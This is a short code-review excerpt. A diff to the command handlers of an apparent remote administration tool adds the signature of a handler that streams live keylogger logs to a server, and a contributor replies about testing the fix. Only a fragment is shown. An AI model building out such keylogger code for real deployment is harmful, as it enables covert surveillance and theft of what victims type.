Client/Core/Commands/SurveillanceHandler.cs

```diff
@@ -217,5 +217,22 @@ public static void HandleGetKeyloggerLogs(Packets.ServerPackets.GetKeyloggerLogs
                 }
             }).Start();
         }
+
+        public static void HandleGetKeyloggerLiveResponse(Packets.ServerPackets.GetKeyloggerLive command, Client client)
+        {
+            new Thread(() =>
```

Comment:
Thanks for pointing this out, I fixed it in the newest commits.  Would you mind taking a look at it and testing how it works?